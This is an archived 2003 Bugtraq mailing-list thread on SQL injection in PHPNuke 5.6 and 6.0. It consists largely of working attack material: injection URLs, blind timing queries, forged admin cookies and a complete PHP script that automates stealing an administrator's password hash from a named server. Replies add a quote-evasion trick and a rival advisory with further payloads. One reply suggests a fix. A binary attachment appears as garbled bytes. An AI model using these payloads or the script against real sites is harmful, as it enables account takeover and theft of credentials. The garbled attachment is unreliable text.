91211 2003-02-21 02:45 /355 rader/ Lucas Armstrong <lucas@cgishield.com>
Importerad: 2003-02-21 02:45 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3587>
Ärende: PHPNuke SQL Injection
------------------------------------------------------------
PHPNuke SQL Injection 2-18-2003
http://CGIshield.com
How to steal the password hash of the Admin user on PHPnuke 6.0 & 5.6
windows+linux method #1
PHPnuke, a widely used open-source web portal system, has been found
to contain a remotely exploitable SQL injection bug, which allows
stealing of the administrator's password hash. With the hash, an
attacker may login and gain complete control of the administrative
side of the system.
The bug exists in the search engine included with PHPnuke
(/modules/search/index.php). In this file, a database call is made
without placing quotes around a user supplied variable. Since the
database call selects information from the user table, a hacker can
use a 'select fish' attack. In this type of attack, the hacker can
determine the value of a single character in any given column in the
table specified in the statement. The column of most importance to a
hacker would be the one holding the administrators encrypted
password. Since the passwords in PHPnuke (and many other programs)
are an md5 hash, there are only 16 possible values for each
character and 32 total characters to expect. Select fishing involves
utilizing the MySQL mid() function to return true if the character
is guessed correctly, thereby returning a set of results to the
screen. If the results show up on the screen, the attacker can
determine that the character is guessed correctly, and then proceed
to guess the next character in the sequence. Any md5 password hash
can be fished in less than 512 (32*16) guesses. When done by hand,
this can take anywhere from 20-30 minutes, but when the process is
automated with a program it can take only a few minutes. One such
program is included at the end of this document.
The first url the hacker would try could look like this:
http://site/modules.php?
name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)
=6&type=stories
When phpnuke queries the mysql database, the query then looks like
this:
"select s.sid, s.aid, s.informant, s.title, s.time, s.hometext,
s.bodytext, a.url, s.comments, s.topic from nuke_stories s,
nuke_authors a where s.aid=a.aid AND (s.title LIKE '%%' OR
s.hometext LIKE '%%' OR s.bodytext LIKE '%%' OR s.notes LIKE '%%')
AND TO_DAYS(NOW()) - TO_DAYS (time) <= 1 or mid(a.pwd,1,1)=6 ORDER BY
s.time DESC LIMIT 0,10"
It would check the admin table to see if the first character in the
pwd (password) column is equal to a value of '6'. If any admin
password begins with a value of '6', stories written by that admin
will appear on the screen. If no admin password begins with a value
of '6', or the admin has written no stories, then the screen will
list no story results.
example admin's hash: 6a204bd89f3c8348afd5c77c717a097a
will the admin's stories show with the following urls called?
(*note* in version 6.0 a check for '()' in any GET variable was added
on line 36 of mainfile.php , therefore the following data strings
will only work via POST in version 6.0 or later. The exploit
included at the end of this file works via POST.)
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=1&type=stories NO
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=2&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=3&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=4&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=5&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=6&type=stories Yes
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=7&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=8&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=9&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=0&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(97)&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(98)&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(99)&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(100)&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(101)&type=stories No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(102)&type=stories No
To guess the next character in the sequence the attacker could use the
following url:
http://site/modules.php?
name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,2,1)
=1&type=stories
and so forth, until all values are determined. When guessing values
from a- f, these values normally would need to be surrounded by
single quotes. This presents a problem for PHP and other
applications which normally escape quotes. To get around this
problem, one could use the mysql char() function which will output
any ascii value, without using quotes. So to guess the letter 'a'
the hacker could use char(97). Here is an example url guessing the
3rd character in the pwd column as 'a': http://site/modules.php?
name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char
(97)&type=stories
Now that the attacker determines the password hash of the admin user,
he can base64 encode the hash (which is what phpnuke expects) and
place it in a netscape cookie file, and gain access to the target
site. If the admin's password is 'admin' and the admin's username is
'admin' then you would take the value 'admin:admin:' and base64
encode it, put it in the cookie (the variable of the encoded values
is itself 'admin') the end result would look similar to this (on
localhost):
lang
english
localhost/html/
1024
1809931264
29595766
4083407360
29522340
*
admin
YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6
localhost/html/
1024
3858912640
29529535
3993654000
29523500
*
How to steal the password hash of the Admin user on PHPnuke 6.0 & 5.6
windows+linux method #2
PHPnuke, a widely used open-source web portal system, has been found
to contain a remotely exploitable SQL injection bug, which allows
stealing of the administrator's password hash. With the hash, an
attacker may login and gain complete control of the administrative
side of the system.
The bug exists due to the format of the admin user's cookies. In
PHPnuke the admin credentials are stored in the form:
'username:password:', with the password md5 encrypted, and the
entire string base64 encoded.
Everytime a webpage is requested on the site running PHPnuke, the
'admin' cookie variable (which contains the username/password value)
is sent to the script, and everytime its validity is checked in the
auth.php file. Here is the key code in auth.php which does the check:
// start code
if(isset($admin) && $admin != "") {
$admin = base64_decode($admin);
$admin = explode(":", $admin);
$aid = "$admin[0]";
$pwd = "$admin[1]";
$admlanguage = "$admin[2]";
if ($aid=="" || $pwd=="") {
$admintest=0;
echo "<html>\n";
echo "<title>INTRUDER ALERT!!!</title>\n";
echo "<body bgcolor=\"#FFFFFF\" text=\"#000000\">\n\n<br><br><br>\n\n";
echo "<center><img src=\"images/eyes.gif\" border=\"0\"><br><br>\n";
echo "<font face=\"Verdana\" size=\"+4\"><b>Get Out!
</b></font></center>\n";
echo "</body>\n";
echo "</html>\n";
exit;
}
$result=sql_query("select pwd from ".$prefix."_authors where
aid='$aid'", $dbi);
if(!$result) {
echo "Selection from database failed!";
exit;
} else {
list($pass)=sql_fetch_row($result, $dbi);
if($pass == $pwd && $pass != "") {
$admintest = 1;
}
}
}
// end code
As you notice, the $admin variable is first base64_decoded(), and
split into the two variables $aid and $pwd. The security problem
lies in the fact that when a string containing one or more single
quote is base64 encoded, and submitted to the site, it will bypass
PHP's automatic escaping of GPC variables. Since no additional
checks are done to defend against an sql injection, an attacker is
free to modify the select query and determine the admin password
hash.
A more advanced version of the select fish attack must take
place. This is because in order to determine a certain character
value, the script has to respond in different way if the character
guess is correct. This is not naturally possible in PHPnuke, but it
can be accomplished using mySQL's benchmark() to give a delayed page
response when the character is guessed correctly.
Now that you are aware of where the sql injection attack occurs, let
me show the process of how this attack would work by modifying the
select query:
(`select pwd from ".$prefix."_authors where aid='$aid'`)
lets say the 'admin' user has a password hash of
'21232f297a57a5a743894a0e4a801fc3'. When we modify the query to check
if the first digit of the 'admin' password hash is equal to '1', we
get the following result:
mysql> select pwd from nuke_authors where aid='admin'
and if(mid(pwd,1,1)=1,benchmark(10000000,encode("AAAA","AAAA")),1)/*;
+----------------------------------+
| pwd |
+----------------------------------+
| 21232f297a57a5a743894a0e4a801fc3 |
+----------------------------------+
1 row in set (0.00 sec)
The small query execution time signifies an incorrect guess. Look
what happens when the attacker correctly guesses that the first
character of the 'admin' password hash is '2':
mysql> select pwd from nuke_authors where aid='admin' and if(mid(pwd,1,1)
=2,benchmark(20000000, encode("AAAA","AAAA")),1)/*;
Empty set (11.11 sec)
The attacker can prolong the execution time to his or her liking when
a correct guess occurs by raising the first argument to the
benchmark() function. By the different server response time , an
attacker can determine a the admin's password hash one character at
a time.
<?php
########## PHPnuke Auto-SelectFish Attacker
########## David@cgishield.com
########## works on phpnuke 5.6 and 6.0
// To use this program, simply upload it to a php enabled webserver,
and execute // If php times out before the whole password hash is
determined, // adjust the maximum script execution time in php.ini
// Also, replace following with correct values:
$server="www.phpnuke.org";
$script="/modules.php";
// Title of a story created specifically by the admin who is being
hacked. $data_to_match="Revolution"; $admin_account_name="nukelite";
$beginchar="1"; $endchar="33";
$admin_account_name=urlencode($admin_account_name);
$data_to_match=urlencode($data_to_match);
$checkchar[0]="char(48)";
$checkchar[1]="char(49)";
$checkchar[2]="char(50)";
$checkchar[3]="char(51)";
$checkchar[4]="char(52)";
$checkchar[5]="char(53)";
$checkchar[6]="char(54)";
$checkchar[7]="char(55)";
$checkchar[8]="char(56)";
$checkchar[9]="char(57)";
$checkchar[a]="char(97)";
$checkchar[b]="char(98)";
$checkchar[c]="char(99)";
$checkchar[d]="char(100)";
$checkchar[e]="char(101)";
$checkchar[f]="char(102)";
for($i=$beginchar;$i<$endchar;$i++){
reset($checkchar);
while (list($i2, $i2val) = @each($checkchar)){
$vars="name=Search&query=$data_to_match&topic=&category=&author=$admin_acco
unt_name&days=1000+and+mid(a.pwd,$i,1)=$checkchar[$i2]&type=stories";
$data=sendToHost("$server",'post',"$script","$vars");
if (eregi("No matches found to your query","$data")){
}
else{
echo("<br>$i= $i2"); flush();break;}
}
}
function sendToHost($host,$method,$path,$data,$useragent=1)
{
$method = strtoupper($method);
$fp = fsockopen($host,80);
fputs($fp, "$method $path HTTP/1.1\n");
fputs($fp, "Host: $host\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
fputs($fp, "Content-length: " . strlen($data) . "\n");
if ($useragent)
fputs($fp, "User-Agent: Mozilla\n");
fputs($fp, "Connection: close\n\n");
if ($method == 'POST')
fputs($fp, $data);
while (!feof($fp))
$buf .= fgets($fp,128);
fclose($fp);
for($slow=0;$slow<100;$slow++){}
return $buf;
}
?>
Vulnerability discovered by: David Zentner, david@cgishield.com
http://CGIshield.com
(91211) /Lucas Armstrong <lucas@cgishield.com>/(Ombruten)
Kommentar i text 91316 av Martin Eiszner <martin@websec.org>
Kommentar i text 91319 av David Walker <bugtraq@grax.com>
91316 2003-02-21 22:00 /57 rader/ Martin Eiszner <martin@websec.org>
Importerad: 2003-02-21 22:00 av Brevbäraren
Extern mottagare: Lucas Armstrong <lucas@cgishield.com>
Mottagare: Bugtraq (import) <3592>
Kommentar till text 91211 av Lucas Armstrong <lucas@cgishield.com>
Ärende: Re: PHPNuke SQL Injection
------------------------------------------------------------
hola,
On 20 Feb 2003 20:36:11 -0000
Lucas Armstrong <lucas@cgishield.com> wrote:
> To get around this problem, one could use the mysql char()
> function which will output any ascii value, without using quotes. So to
> guess the letter 'a' the hacker could use char(97). Here is an example url
> guessing the 3rd character in the pwd column as 'a':
> http://site/modules.php?
> name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char
> (97)&type=stories
JFYI:
this maybe off topic but it worth mentioning .. a couple of month ago
we found out that the mysql char() function can be used within the
"like() - function" to place quotes.
this may help somebody doing sql-injection in an "quote-stripped :-)"
environment.
example query:
---*--- select id,Name,password from Users where id = 1 and (user()
like "%root%");
---*---
and now "without" quotes:
---*--- select id,Name,password from Users where id = 1 and (user()
like char(37,114,111,111,116,37));
---*---
...
nice day,
mEi
--
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
tel: 0043 699 121772 37
(91316) /Martin Eiszner <martin@websec.org>/(Ombruten)
91319 2003-02-21 22:35 /13 rader/ David Walker <bugtraq@grax.com>
Importerad: 2003-02-21 22:35 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3594>
Kommentar till text 91211 av Lucas Armstrong <lucas@cgishield.com>
Ärende: Re: PHPNuke SQL Injection / General SQL Injection
------------------------------------------------------------
When programming a system that creates sql strings based on passed in
integers i.e. where some_int=$variable_from_querystring you must
always do a check to confirm that that variable contains only numeric
data.
an alternate fix on sql servers that allow the format
where some_int='1234' -- (quoted numbers) would be to do where
some_int='replace($variable_from_querystring,"'","''")' This would
cause a more than likely harmless error to occur whenever character
occurs within the passed in numeric/integer variable.
(91319) /David Walker <bugtraq@grax.com>/-(Ombruten)
91334 2003-02-22 00:00 /243 rader/ Oriol Carreas <uri@7a69ezine.org>
Importerad: 2003-02-22 00:00 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: uri@7a69ezine.org
Mottagare: Bugtraq (import) <3604>
Ärende: RE: PHPNuke SQL Injection
------------------------------------------------------------
I don't like to claim for the authory of bugs, because It is not
possible to clarify who discovered/exploited first some bug because
some times we are too lazy to publish them for any reason. But this
is an special reason because the person that claims for the authory
of the TWO "PhpNuke SQL Injection" has discovered them at the same
time than me and exploits them _exactly_ the same way than me so I
think that it can not be a coincidence.
I've been testing the methods of explotation this last week and it
is possible that "David Zenter" (the person who write that advisory)
found that kind of attacks , programmed an exploit for them and
finally he wrote the advisory stealing the authory of this 2 bugs
I am not sure of that so I would like him to answer.
I discovered the $user bug one month ago ( In fact I searched the
website and I found that RFP found them some years ago , but he
didn't publish a succesfull way to exploit them).
I contacted Francisco Bucci ,the author of PhpNuke and I suggested
some patches to him ( and he published the patches in his website)
but phpnuke had still a lot of bugs so I waited to finish my job to
publish them.
PhpNuke has been here for a lot of time so I dont't believe that a
person finds the same _TWO_ bugs than me and exploits them in te
same way so I want "David Zenter" to clarify that.
I am developing another vulnerabilities , what is very strange for
me is that the 2 ones that I've developed are the ones that
"David Zenter" published.
Now I attach the two advisories and the two exploits that I had
written for these bugs judge for yourself if you thing that this
can be a coincidence.
PD.- Excuse my poor english :)
;==================================================================
PHPNUKE is_user || is_admin VULNERABILITY
;==================================================================
General Data :
--------------
Aplicacion : PhpNuke.
Versions : <= 6.5 ( withouth the patch).
Vulnerability : Sql injection in the cookies user y admin.
: Access to the application at administration level
OR guess any user password.
Introduccion:
-------------
PhpNuke is a well known content management system programed
in PHP by Francisco Bucci, a lot of people use it because it is very
easy to install and manage.
PhpNuke doesn't chech the integrity of the cookies "user" and
"admin" that it uses to follow sessions, so it is posible to inject
SQL code and get de administration password.These coockies are
encoded using base64 so the "magic quotes" protection of PHP is not
working.
Vulnerability:
--------------
The Vulnerable function is found in the file "mainfile.php" :
-------------------------------------------------------------------------------
function is_user($user) {
global $prefix;
if(!is_array($user)) {
$user = base64_decode($user);
$user = explode(":", $user);
$uid = "$user[0]";
$pwd = "$user[2]";
} else {
$uid = "$user[0]";
$pwd = "$user[2]";
}
$result=mysql_query("select pass from $prefix"._users."
where uid='$uid'");
list($pass)=mysql_fetch_row($result);
if($pass == $pwd && $pass != "") {
return 1;
} return 0;
}
-------------------------------------------------------------------------------
The function is_admin is almost like the other one.
There is no other integrity check to the cookie $user in the
phpnuke code so it is posible to inject SQL code in this way :
$user = base64_encode("uiduser'
CODIGOSQL:noimporant:passowrd");
Most PhpNuke websites uses mysql 3.x so it is not posible to
use UNION so initialy it seams dificult to exploit.
Way to exploit:
---------------
To get information from that query we need a valid PhpNuke
user, but that is very easy because PhpNuke lets anybody create a
user easily. Once we have a valid userid and a valid password we can
send a query like:
SELECT pass from nuke_users where uid='<target_uid>'
AND pass LIKE '<test>' OR uid='<our_uid>'
This SELECT will give the password of "target_uid" if <test>
is correct or our password if that test is not correct. So we can
retrieve information from that query if we see if we are logged or
not. This allows us to bruteforce the target password with LIKE's (
we only check one character at the same time )
PhpNuke uses md5 in version 6.x ( crypt in versions 5.x )
that gives an average of 32*(16/2) = 256 tries to get a valid
password.
I have tested this method and it is posible to get a valid
password within 10 minutes.
Example of a cookie using this method:
user = base64_encode("2' AND pass LIKE
'a12bc___________________________' OR
uid='5612:noimportant:1234567889012345678901234567890ab");
Where '_' in LIKE's means any character.
Using that method we can find the cookie of _any_ user in phpnuke, in
phpnuke 5.x (I think) that is not possible to go further but in
phpnuke 6.x we can use the fact that the admin password is stored in
nuke_authors and in nuke_users.
In the test that I've done , the uid=2 in nuke_users is the
uid=1=admin in nuke_authors.
Patches:
--------
There is a patch for this vulnerability in PhpNuke's website
but I must say that PhpNuke's seams to have some other
vulnerabilites not yet published.
Credit:
--------
I found this vulnerability one month ago , I dind't believe
that this vulnerability could be in PhpNuke!! , because it is very
used and a lot of people had already audited it before me , so I
searched in google to find that vulnerability I found that RFP had
discovered that some years ago , in PhpNuke 4.x !!! WooW , and it is
still in PhpNuke!! :? RFP didn't find a way to exploit that , but he
discovered this vuln.
;==================================================================
PHPNUKE Search vulnerability
;==================================================================
General data :
--------------
Aplicacion : PhpNuke.
Versions : <= 6.5 ( withouth the patch).
Vulnerability : Sql injection in the search form.
: Access to the application at administration level
OR guess any user password.
Introduction:
---------
PhpNuke is a well known content management system programed
in PHP by Francisco Bucci, a lot of people use it because it is very
easy to install and manage.
PhpNuke doesn't check the parameter "category" in the search
form to be numeric, and when it builds the SQL query it does not
enclose it with quotes , so it is easy to inject SQL code, quotes
will not be allowed in this code because the "magic quotes"
protection of phpnuke would add slashes to them
Vulnerabilitu:
---------------
The vulnerable code is in modules/Search/index.php in PhpNuke 6.x
and in /search.php in PhpNuke 5.x
-------------------------------------------------------------------------------
if ($category > 0) {
$categ = "AND catid=$category ";
} elseif ($category == 0) {
$categ = "";
}
$q = "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext,
s.bodytext,
a.url, s.comments, s.topic from ".$prefix. "_stories s,
".$prefix."_authors
a where s.aid=a.aid $queryalang $categ";
-------------------------------------------------------------------------------
This query is done using the nuke_authors table , ( with de
variable 'a' ). so it is posible to get the admin password using a
tecnique similar to the last advisory.
Explotation Method:
-------------------
As I said in the last advisory PhpNuke mainly uses MySQL 3.x
so it is not posible to use UNION's tot get the admin password ( in
this case it would be possible to get the admin password string
directly with unions )
But we can use a similar tecnique to the last advisory but
withouth using quotes , if we inject :
AND MID(a.pwd,characternumber,1) = CHAR( characterascii)
If characterascii is valid the query will give us the search
result otherwise it won't give us anything.This allows us to
bruteforce the administration password, wich can be done with less
than 10 minutes.
Other parameters can be retrieved using this tecnique:
* a.uname : needed to log in phpnuke using the admin
cookie.
* user() : mysql user , if it is root we can use some
tecniques like creating a file etc ...
* database()
* useyouimagination ...
Patches:
--------
As far as I am concerned there is not an official patch , but
a workarround is very easy , you just have to enquote the 'category'
parameter and test that it is a numeric field.
Credit:
--------
I don't know anybody who has already discovered that If you
feel that I am not correct please contact with me.
Vulnerability developed by : Oriol Carreras - <uri@7a69ezine.org>
--
>===============================
>
> http://ripe.7a69ezine.org
>===============================
(91334) /Oriol Carreas <uri@7a69ezine.org>/(Ombruten)
Bilaga (application/x-tgz) i text 91335
Bilaga (application/x-tgz) i text 91336
91335 2003-02-22 00:00 /16 rader/ Oriol Carreas <uri@7a69ezine.org>
Bilagans filnamn: "search.tar.gz"
Importerad: 2003-02-22 00:00 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: uri@7a69ezine.org
Mottagare: Bugtraq (import) <3605>
Bilaga (text/plain) till text 91334
Ärende: Bilaga (search.tar.gz) till: RE: PHPNuke SQL Injection
------------------------------------------------------------
���±£U>��í�ÛvÛ6²¯äW Ê:�+åK�Ét×qäÆml§¼Û6ñÑ¡)ÈbL*IÙqZ×>î7ì§ì�ìÌ�¤@¶Ó4'ÝÝ#$"Á`f0W¸�:ã�?õ�7nf¾�»�Õ¯>[kÍæÖÆÆWÍfÓ|ºÙT±o´`ìéVksÝ|j¶6�~³µi~Å»Û,í±¯"{�Ù÷À=4þ?Ú�k¨é�ÿ0jåç^cïM¡;rù���\ϳ;z|ÂýØFåbÁÛ�ßÚ0p2üý#¡ë]ßñfCζ£xè¹çõñ�k4Ø¡íy�u��ÄÑÑ4týxÐÏÃPׯ�wÈÖ"{Ä��[Ü�|�3ü1ô_u&�'ÓNÚåÊðn)ó�#�ÏLZÈãYè³�Ûô{�¿g²$½,论a�mÉoyeh¼õKU"¡³0¿wãrÍ4Ôeou]wÆ`�°+n4ØÚxsÆ,�/í>ß{ÑÝÿöåÁwß¿:<:~ýÃI¯ú·¿ÿøÓÏö¹3䣱ûîÒøÁô0gW×ïo>4ÍÖúÆæÖÓ¯U�%XF�Z�üõ&î�¸ï�C>�ûÏÊ�øÑâk®_OÁ,NÄ=ó#÷Â�]¢�Ç��ü]�ô;&³�÷æ|ow3y_�ï-x§�D]©@gʪcîì´$øâh¹�K<aÍ÷ëÆö6Û0Øo�ºZÔµß4ØÎ�tÞ|�k0ßóשoæo�w..áÖ÷%T�³;&$%ä(¥
â¤Îhvþ;q�¨o*àé,µ�¥wÚ�*ü¼à°'böIþÒYr�#o*`Í�¬ÁÖY�¤"�X9g±£ÓW¯æf!ùÁN¹�R�ø%�� ÇJV�£ de�AaÙ�¸c±uüÁ¯XáWÅ6�¶P�ËeZÂ@�aK�k£A1p-Å6HTVpÁl7�íÿ(~�ßF�ø��u}æ�#(��;±`2 ½P�~ �|ådB;�±~¦ø0Øìwê+ØUbO�1kõmsu���Q~g5;ï¶ÝλJÅÈp�3ÞáLÒ¬J%³RÑn ��{_À°ÄÆâ��.VYµ�ºòÂ�"[KiÎTB¡]dYvLþ-º+ÿ�¾5�Èÿ`xs!ÿÛxºÌÿ¾D+"å4�£?iÄbj¤�þÙL,Û'·ýOl×ÿ¥�µûí¿en<5¥ý·LÓDûß0·õß�i�_ÿÉ:ïõxêÏ.±"ÍÙaçá,æ�¤��²¶ññÅZ·¸S*(Øt�ª4Ǭ^WF¡cµ��<��Q|~ãÛ�®b¸�ñÍG%Û��Î%%ve,¼z�Cãú\;<8z½ÛëifÒÃ�wÄ�¶ÙL¡Xÿà°{|Ú�B/¶
�S �ÃóÓýýî Ó¶�:�zk÷ôUÿõñI_û�úõþ³�����Â(ý
8Âج¿O`"�õÔ°�h5Nº?v{}M+½>îõY�
ö�2§ß ��m.{Ùï¿nõ&Ô¦ß5[h�NÎNд·:üSz �Óf+ìLº÷�?æ~\ëÃö´=z®Cç�÷µëëë�?©ÍBOD¥!ÎÎN|Åýx�a,³ ..6ìÞñQ¿{tÃ:ü"�o¬èÉ/3��vi�wpô]w¯?O1K+ÃÊîÑÊáÁÖ×+QueX5áñYÅs/yeïåî
�±¯Ã3ØÛíuµ�Çó£Ý>�¢�ÏO¿Õ4EO0J� �¡P�ø��eÇ�m'æaÕ#Ñ�
�U¨
Ñ}�2Ó
eÕêuÖ;Þc§Glï´ÒE
\AsiÓ"M£¢ÊWm
|/Xî`äroÈ4K��C>�´
;�zbÇ�«¢8tý�X�¡ñki�03'ÖÐÄíá0�¸¾6�®O
ÖG=�û�p¼��)Ø��°VÖ�
n±Â�tt-}¶2~§�iPt=¢g]�LZþ¼ó��j7ùA�5H�xW�CD ¼F�Öh·ºvþAùÂ��ò�hUØ5p�Y\0²'®wc¥Ô×vÆÄ>:È�p�
5Á+I*�2á�gz¡@�Ku�o¶GªQGÓ5î�¥\ËU§�\¶¥(`I�R�£7Æ(?<�R?PyB�&�Å2mo´
¨G(�À
´ä|6�ñ°#Gðä@<ÆAl{�Ñî¼àÊö�þ�X��,�8¸GÇ�Úh�Ïb�|��£QÊNC�5åÝýÁÁQ·_�óø~Ð�ÛØ=��ú0÷ë�r8HF cíoõ�±A�ðÑL�´×�¶f�iÒe��ÀE®ÇHöèø{��ìv�I
`U:ß($_�OÊIÈ@�¨»#?�í�t˽¬�ù <ådk
ÌÄ^ZjI�U£Ã�s�`UeH§·À
)ûN¯Ã@0@�àå®���Ee�<ÇVS:*6´bI�Óö_�~î�$bÈÞ^·/�ÉH«ÇWÐåXi
�©§B|×c×ãeV±=g=yÂè¤îÕ�/su¶Ä�S1ç�Uѧȵü\öÈb5��©w¼�Â�é3¼ÉóÄôÀtÑÍfc �íʨìAø�V%×DíäU VdîÂÆ]_��j"èàD¶-`�A¤~Ajò�Í<aÍû�¯º�Bò8uÍ
6
f>'±¦kéѷݳ£»Ò£OÏ�N�2$íãR$m±Q4_:1H{�ä;eì��3��^UòÓ|&|éþùXJhtßsÎåöÜ ª"�h¼ôiªRÈ#dpbyUô7jrÝÍN:ÛÊ�
(�É~
ï�ýÕÅáHzH V®&"¯ª�W3PM¬�}ó»÷òEbýó£å?
Ã$¢(ôk��Vi6�£Ë�ne8!Í�\<Xùë��4�£"Å$1W(8 ÆåìêÇÌHdÌÀ)ÁE¬I79µ9·�áÁÐÝÒ�n¿Ê Mº¦VÊQd¡Êæ×\�þèù¸s ï �9ÂjnÎKH$;Æ�¡$©À�BéA
AÙpä�¤¡féìâµ�_ñ¡²�â¸s)Õ¡�ÛxÏe�e�aWëyN¥öZ�TN�(�c(ç%õ®ÏlÑ�!Hd)�°f}�OJÕҵȧ(�L��·@æÙ2!ë72�CT´Ber2
MpÖ%«¥¬|�FÄþtmì¼-b¹õGYný³<÷=P³âb�é�(?ü)ªZÕbÚ-
PY³x÷´«I È(ä¼<§A¾¦:Mï©AÉ÷¹Ç L]néI¦Eð/$|Vék�EáÌ
¦v4�]ß]z�Þ;Wçþä¿wOú?��¿Þí½Øÿöåwß¿úùǽ¿=?:<L¯ýÏKIYbüø^`þm@Ñ�õZÙxsöëí_ÆÛ·¿=þæOþñh{çßÿ���a£ñ0ÿT>ûúéÖæÆzËlÞ��æçt¥�È¢$Ñ1@ìiÎ� ?ST0,�"u4DÄ�µ²?é¥ò ?ʲ�9´4Ø(�ª@óª,Õí�b2Ë �UA�¶åV&�tLµZÜ7ÙÉgÜ7*ëg8+!êmø�Y�u=qáÁÖ=T³ï �Õ·ì¹C��ñHGQpÖõ»ñKÿ�«t2½©6H"97·hÑU^µWk«»«Ò9QQÿ9èç=cFNsu�U±�¤ �Üʨ ñ���XbÀRzw¬$gÔ2[?vxëKÖPÉéMxÑ2ó!��,B�dß0ã8 ÜyªÖ�(ëX�gCÉw9ë/XÎ_ò§H½W�«UÁtÎ(-i²wg±'Ç5
¦'}eXÊÏ*¶Áí\`?!4çRHj·òxu�Ù�Émò4�.B{B"ã:$+�WN�ßƵ±zL¤ôäù�£�bq|Â(¨2�T�ÆßÔbÐ>¦jǾwó�)���xbY)×�þñcV�Ø��ÐLî,�vÔÝëövO�z�¸ÜF6w�нf�Ð3bÛj´#±ßþÁH0)r�|@ÇÄwuÐuõ欪Ë:=ÓÔ/ï�
Ì?:ºÎßCõåÏG�IG(;Þ�/,µÐ¾·=Ò-��R·©ã�ò,F#�Ã'�5çºæ¡ G�ýsî;ã�^Â
x�51`¹k{y�Ø$½½!©Û[Ò<FTg�GÂäÊDµ%EK¼âjiÜ�µãiÛkOÚ%ÃxdÕL7ºva×ļ4ø ©j«ãÕ69�Üa« $��6¨ÚÕ���ðÊ$9ÚIQ¼ÉN;_cáðyÈíËN²2ÓV§ri�.Ì�OÎ�§yfÓ(©zÉDe�~Ïü¯jî=¼Wè"9Ï��d$ |´$´Õ¤Gµ�èÉm:3K:ò;H��©U
��Ë!�ÓÞTaÔxuÞ�d®Ö~û=R)¥�åê!Ã@âfL�Ô(å¢Z�ͯÓë¢úNÈ�^¥Ç衬¶Cg�·ÔãbUÀ�Lq^®bl�c|�í^�ðLbÌ�¬!÷LYX¸®¤QJ¼
ê�ÓL ¿½�j3&É%�H� �Ì»Ò
h ÜG!áBWåb_![
Ke^�½YN,¨Ð�ÞØB_\¦¯}éÄp^cåQ³Î«Ôt={�ñ!]Âá·W¬Ç�¤¦²�k.L=MÎyÿÛ�tG4U�R³�¿��.*Û�N\�~g��B{ÂÛHtûܳÓÛ®ÛÿoÞrß�
ã)Æg]ã¡ï?[[Ü÷�ëå÷__¢=Ö�k¥d×Kúc]Çr�u
RèÇm�{
ë°µzà��×õî«îa÷¨ß�Ç�P¶X�ô�Pþ¥�'s�õ��ædEÊ�EnT¤íÿ�Ãû/i9û?éî¾8ì~æ5�²ÿõ§é÷ôýçúÓÍ¥ýÖ�»�»ß�Ý
ù�÷)þw=( !/dQÀÄ(�¢Pô�bD�Ø9O-Þöªº�G�3�²ëfCØx¬?tñö�ª7�éºRðÆXóB`Õu"äÚ�çC¹pÖ¢ÓùUi2b0�2�xði�Ä+³ÙxlÇúM0�9�ðc9 r´®ë�#~Mp!³>|rs�É�ðAÊ@u½:, óúúº~>�g糺�L°�·ë6TõnÙC÷�2�@pS�f H]ü
ü\>§5¾$+mêúzuýwÁ
k�]?
ÝúÒÙ-Û²-Û²-Û²-Û²-Û²-Û²-Û²-Û²-Û²-Û§·ÿ�½|�/�P��
(91335) /Oriol Carreas <uri@7a69ezine.org>/(Ombruten)
91336 2003-02-22 00:00 /17 rader/ Oriol Carreas <uri@7a69ezine.org>
Bilagans filnamn: "user.tar.gz"
Importerad: 2003-02-22 00:00 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: uri@7a69ezine.org
Mottagare: Bugtraq (import) <3606>
Bilaga (text/plain) till text 91334
Ärende: Bilaga (user.tar.gz) till: RE: PHPNuke SQL Injection
------------------------------------------------------------
